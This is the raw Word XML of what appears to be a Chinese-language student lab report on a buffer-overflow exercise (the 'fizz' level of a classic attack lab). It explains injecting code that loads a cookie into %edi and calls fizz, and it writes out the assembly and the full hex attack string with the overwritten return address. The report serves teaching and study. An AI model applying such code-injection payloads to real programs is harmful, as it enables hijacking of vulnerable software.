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FCAB" w14:textId="18D7F445" w:rsidR="00BE4F1B" w:rsidRDefault="00D310B6">
      <w:r>
        <w:t>fizz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>izz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数并且将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作为参数传递给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>izz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，由于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位程序采用</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>寄存器传参而</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不是堆栈传参，因此必须在输入的字符串中注入恶意代码完成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到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>寄存器的转移。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2ABD9" w14:textId="4B7C5EFD" w:rsidR="005A50F2" w:rsidRDefault="005A50F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写的恶意代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B0A4BA" w14:textId="77AC4474" w:rsidR="005A50F2" w:rsidRDefault="005A50F2">
      <w:r>
        <w:t xml:space="preserve">(cookie = </w:t>
      </w:r>
      <w:r w:rsidRPr="005A50F2">
        <w:t>0x2e561bea</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CB1419" w14:textId="40E9B7E0" w:rsidR="005A50F2" w:rsidRDefault="005A50F2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>movl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:r w:rsidRPr="005A50F2">
        <w:t>0x2e561bea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005A50F2">
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A50F2">
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C038149" w14:textId="210EFD22" w:rsidR="005A50F2" w:rsidRDefault="00DB2073">
      <w:r>
        <w:t>call fizz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BAF3ED" w14:textId="79832FFF" w:rsidR="005A50F2" w:rsidRDefault="00DB2073">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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软件编译上述汇编代码，得到对应的机器语言。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D5420C" w14:textId="3DD9D763" w:rsidR="00DB2073" w:rsidRDefault="00DB2073">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2073">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6928D691" wp14:editId="059ED7E3">
            <wp:extent cx="5274310" cy="593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3CC3" w14:textId="7FA6B8F8" w:rsidR="005D44A5" w:rsidRDefault="00DB2073">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设法构造攻击字符串，使得程序跳转到输入字符串起始位置，也就是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的位置。在攻击字符串的开头处编写恶意代码，从而以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为参数调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>izz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A12FA6E" w14:textId="3A5FD57B" w:rsidR="00DB2073" w:rsidRDefault="00DB2073">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写的攻击字符串如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167DD937" w14:textId="77777777" w:rsidR="00074B17" w:rsidRDefault="00074B17" w:rsidP="00074B17">
      <w:r>
        <w:t xml:space="preserve">/* bad code of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7502CBFF" w14:textId="77777777" w:rsidR="00074B17" w:rsidRDefault="00074B17" w:rsidP="00074B17">
      <w:r>
        <w:t>/* mov cookie, %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758FE9C" w14:textId="77777777" w:rsidR="00074B17" w:rsidRDefault="00074B17" w:rsidP="00074B17">
      <w:r>
        <w:t>/* call fizz */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C5BA5" w14:textId="77777777" w:rsidR="00074B17" w:rsidRDefault="00074B17" w:rsidP="00074B17">
      <w:r>
        <w:t xml:space="preserve">bf </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1b 56 2e e8 1e d7 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>d7</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC4B2E4" w14:textId="77777777" w:rsidR="00074B17" w:rsidRDefault="00074B17" w:rsidP="00074B17">
      <w:r>
        <w:t>/* complete the string */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310FA8AD" w14:textId="77777777" w:rsidR="00074B17" w:rsidRDefault="00074B17" w:rsidP="00074B17">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C6B224" w14:textId="77777777" w:rsidR="00074B17" w:rsidRDefault="00074B17" w:rsidP="00074B17">
      <w:r>
        <w:t xml:space="preserve">/* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rbp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ACD8E2" w14:textId="77777777" w:rsidR="00074B17" w:rsidRDefault="00074B17" w:rsidP="00074B17">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F092CB7" w14:textId="77777777" w:rsidR="00074B17" w:rsidRDefault="00074B17" w:rsidP="00074B17">
      <w:r>
        <w:t>/* ret add */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098DA628" w14:textId="506B54DF" w:rsidR="00DB2073" w:rsidRDefault="00074B17" w:rsidP="00074B17">
      <w:r>
        <w:t>b0 39 68 55 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A3DA76" w14:textId="77777777" w:rsidR="00074B17" w:rsidRPr="005A50F2" w:rsidRDefault="00074B17" w:rsidP="00074B17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00074B17" w:rsidRPr="005A5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C6"/>
    <w:rsid w:val="00074B17"/>
    <w:rsid w:val="001438C6"/>
    <w:rsid w:val="003020CE"/>
    <w:rsid w:val="005A50F2"/>
    <w:rsid w:val="005D44A5"/>
    <w:rsid w:val="0077719E"/>
    <w:rsid w:val="00A37611"/>
    <w:rsid w:val="00A84C9D"/>
    <w:rsid w:val="00BE4F1B"/>
    <w:rsid w:val="00D310B6"/>
    <w:rsid w:val="00D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2036"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D8F5398B-8B32-4F55-95A9-D5411DD7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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-28T09:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-29T02:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>